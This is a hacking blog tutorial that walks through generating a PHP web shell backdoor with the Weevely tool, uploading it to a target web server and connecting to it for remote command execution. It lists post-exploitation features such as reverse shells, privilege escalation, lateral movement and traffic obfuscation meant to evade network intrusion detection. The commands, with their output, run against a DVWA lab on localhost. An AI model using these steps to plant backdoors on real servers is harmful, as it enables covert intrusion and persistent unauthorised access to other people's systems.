Welcome back, Hackers! Today we’re going to create a simple PHP web shell and backdoor using Weevely. Weevely is a command-line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.
Its terminal executes arbitrary remote code through a small-footprint PHP agent that sits on the HTTP server. Over 30 modules shape an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation and network lateral movement, even in restricted environments.
Let’s get started!
The Weevely PHP stealth web shell and backdoor has more than 30 modules available for post-exploitation tasks.
The framework features:
- SSH-like terminal
- SQL console pivoted on target
- HTTP proxy pivoted on target
- Host configuration security auditing
- Mount of the remote filesystem
- Network scan pivoted on target
- File upload and download
- Reverse and direct TCP shell
- Meterpreter support
- Service account bruteforce
- Compressed archive management
Weevely's communications are hidden: all traffic between client and server is carried in HTTP cookies and obfuscated to bypass NIDS signature detection.
Things you need:
- Weevely https://github.com/epinna/weevely3
- Web Server (I’m using DVWA)
Generate the backdoor agent
The Weevely client communicates with the PHP agent installed on the target. Move to the weevely3/ folder and run ./weevely.py to print help, or simply type weevely in your terminal.
[+] weevely 3.2.0
[!] Error: too few arguments
[+] Run terminal to the target
weevely <URL> <password> [cmd]
[+] Load session file
weevely session <path> [cmd]
[+] Generate backdoor agent
weevely generate <password> <path>
To generate a new agent, just use the generate option, passing the password and path arguments.
root@TheHackerToday:~# weevely generate 123 /root/Desktop/backdoor.php
Generated backdoor with password '123' in '/root/Desktop/backdoor.php' of 1476 byte size.
Then, upload the generated agent under the target web folder. Make sure that the agent PHP script is properly exposed and executable through the web server.
Connect to the agent
Launch the weevely script to connect to the remote agent.
root@TheHackerToday:~# weevely http://localhost/backdoor.php 123
At the first weevely> prompt the client is not yet connected, which lets you set any pre-connection options first, e.g. the proxies to be used. Running a real command automatically starts the session on the remote target.
weevely> uname -a
Linux TheHackerToday 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux